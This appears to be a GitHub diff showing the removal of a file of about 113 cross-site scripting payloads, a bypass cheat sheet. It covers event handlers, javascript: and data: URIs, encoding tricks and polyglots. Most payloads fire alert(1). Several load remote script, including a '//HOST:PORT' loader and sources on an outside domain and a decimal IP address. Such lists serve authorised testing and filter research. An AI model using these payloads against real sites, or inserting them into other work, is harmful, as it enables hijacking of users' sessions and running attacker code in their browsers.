| 1 | | - | <svg onload=alert(1)> |
| 2 | | - | "><svg onload=alert(1)// |
| 3 | | - | "onmouseover=alert(1)// |
| 4 | | - | "autofocus/onfocus=alert(1)// |
| 5 | | - | '-alert(1)-' |
| 6 | | - | '-alert(1)// |
| 7 | | - | \'-alert(1)// |
| 8 | | - | </script><svg onload=alert(1)> |
| 9 | | - | <x contenteditable onblur=alert(1)>lose focus! |
| 10 | | - | <x onclick=alert(1)>click this! |
| 11 | | - | <x oncopy=alert(1)>copy this! |
| 12 | | - | <x oncontextmenu=alert(1)>right click this! |
| 13 | | - | <x oncut=alert(1)>copy this! |
| 14 | | - | <x ondblclick=alert(1)>double click this! |
| 15 | | - | <x ondrag=alert(1)>drag this! |
| 16 | | - | <x contenteditable onfocus=alert(1)>focus this! |
| 17 | | - | <x contenteditable oninput=alert(1)>input here! |
| 18 | | - | <x contenteditable onkeydown=alert(1)>press any key! |
| 19 | | - | <x contenteditable onkeypress=alert(1)>press any key! |
| 20 | | - | <x contenteditable onkeyup=alert(1)>press any key! |
| 21 | | - | <x onmousedown=alert(1)>click this! |
| 22 | | - | <x onmousemove=alert(1)>hover this! |
| 23 | | - | <x onmouseout=alert(1)>hover this! |
| 24 | | - | <x onmouseover=alert(1)>hover this! |
| 25 | | - | <x onmouseup=alert(1)>click this! |
| 26 | | - | <x contenteditable onpaste=alert(1)>paste here! |
| 27 | | - | <script>alert(1)// |
| 28 | | - | <script>alert(1)<!– |
| 29 | | - | <script src=//brutelogic.com.br/1.js> |
| 30 | | - | <script src=//3334957647/1> |
| 31 | | - | %3Cx onxxx=alert(1) |
| 32 | | - | <%78 onxxx=1 |
| 33 | | - | <x %6Fnxxx=1 |
| 34 | | - | <x o%6Exxx=1 |
| 35 | | - | <x on%78xx=1 |
| 36 | | - | <x onxxx%3D1 |
| 37 | | - | <X onxxx=1 |
| 38 | | - | <x OnXxx=1 |
| 39 | | - | <X OnXxx=1 |
| 40 | | - | <x onxxx=1 onxxx=1 |
| 41 | | - | <x/onxxx=1 |
| 42 | | - | <x%09onxxx=1 |
| 43 | | - | <x%0Aonxxx=1 |
| 44 | | - | <x%0Conxxx=1 |
| 45 | | - | <x%0Donxxx=1 |
| 46 | | - | <x%2Fonxxx=1 |
| 47 | | - | <x 1='1'onxxx=1 |
| 48 | | - | <x 1="1"onxxx=1 |
| 49 | | - | <x </onxxx=1 |
| 50 | | - | <x 1=">" onxxx=1 |
| 51 | | - | <http://onxxx%3D1/ |
| 52 | | - | <x onxxx=alert(1) 1=' |
| 53 | | - | <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> |
| 54 | | - | 'onload=alert(1)><svg/1=' |
| 55 | | - | '>alert(1)</script><script/1=' |
| 56 | | - | */alert(1)</script><script>/* |
| 57 | | - | */alert(1)">'onload="/*<svg/1=' |
| 58 | | - | `-alert(1)">'onload="`<svg/1=' |
| 59 | | - | */</script>'>alert(1)/*<script/1=' |
| 60 | | - | <script>alert(1)</script> |
| 61 | | - | <script src=javascript:alert(1)> |
| 62 | | - | <iframe src=javascript:alert(1)> |
| 63 | | - | <embed src=javascript:alert(1)> |
| 64 | | - | <a href=javascript:alert(1)>click |
| 65 | | - | <math><brute href=javascript:alert(1)>click |
| 66 | | - | <form action=javascript:alert(1)><input type=submit> |
| 67 | | - | <isindex action=javascript:alert(1) type=submit value=click> |
| 68 | | - | <form><button formaction=javascript:alert(1)>click |
| 69 | | - | <form><input formaction=javascript:alert(1) type=submit value=click> |
| 70 | | - | <form><input formaction=javascript:alert(1) type=image value=click> |
| 71 | | - | <form><input formaction=javascript:alert(1) type=image src=SOURCE> |
| 72 | | - | <isindex formaction=javascript:alert(1) type=submit value=click> |
| 73 | | - | <object data=javascript:alert(1)> |
| 74 | | - | <iframe srcdoc=<svg/onload=alert(1)>> |
| 75 | | - | <svg><script xlink:href=data:,alert(1) /> |
| 76 | | - | <math><brute xlink:href=javascript:alert(1)>click |
| 77 | | - | <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> |
| 78 | | - | <html ontouchstart=alert(1)> |
| 79 | | - | <html ontouchend=alert(1)> |
| 80 | | - | <html ontouchmove=alert(1)> |
| 81 | | - | <html ontouchcancel=alert(1)> |
| 82 | | - | <body onorientationchange=alert(1)> |
| 83 | | - | "><img src=1 onerror=alert(1)>.gif |
| 84 | | - | <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> |
| 85 | | - | GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; |
| 86 | | - | <script src="data:,alert(1)// |
| 87 | | - | "><script src=data:,alert(1)// |
| 88 | | - | <script src="//brutelogic.com.br/1.js# |
| 89 | | - | "><script src=//brutelogic.com.br/1.js# |
| 90 | | - | <link rel=import href="data:text/html,<script>alert(1)</script> |
| 91 | | - | "><link rel=import href=data:text/html,<script>alert(1)</script> |
| 92 | | - | <base href=//0> |
| 93 | | - | <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1) |
| 94 | | - | <body onload=alert(1)> |
| 95 | | - | <body onpageshow=alert(1)> |
| 96 | | - | <body onfocus=alert(1)> |
| 97 | | - | <body onhashchange=alert(1)><a href=#x>click this!#x |
| 98 | | - | <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x |
| 99 | | - | <body onscroll=alert(1)><br><br><br><br> |
| 100 | | - | <br><br><br><br><br><br><br><br><br><br> |
| 101 | | - | <br><br><br><br><br><br><br><br><br><br> |
| 102 | | - | <br><br><br><br><br><br><x id=x>#x |
| 103 | | - | <body onresize=alert(1)>press F12! |
| 104 | | - | <body onhelp=alert(1)>press F1! (MSIE) |
| 105 | | - | <marquee onstart=alert(1)> |
| 106 | | - | <marquee loop=1 width=0 onfinish=alert(1)> |
| 107 | | - | <audio src onloadstart=alert(1)> |
| 108 | | - | <video onloadstart=alert(1)><source> |
| 109 | | - | <input autofocus onblur=alert(1)> |
| 110 | | - | <keygen autofocus onfocus=alert(1)> |
| 111 | | - | <form onsubmit=alert(1)><input type=submit> |
| 112 | | - | <select onchange=alert(1)><option>1<option>2 |
| 113 | | - | <menu id=x contextmenu=x onshow=alert(1)>right click me! |
| 114 | | - | |
| 115 | | - | |
Manish Sharma
committed
with
GitHub
3 years ago
1 parent a832c179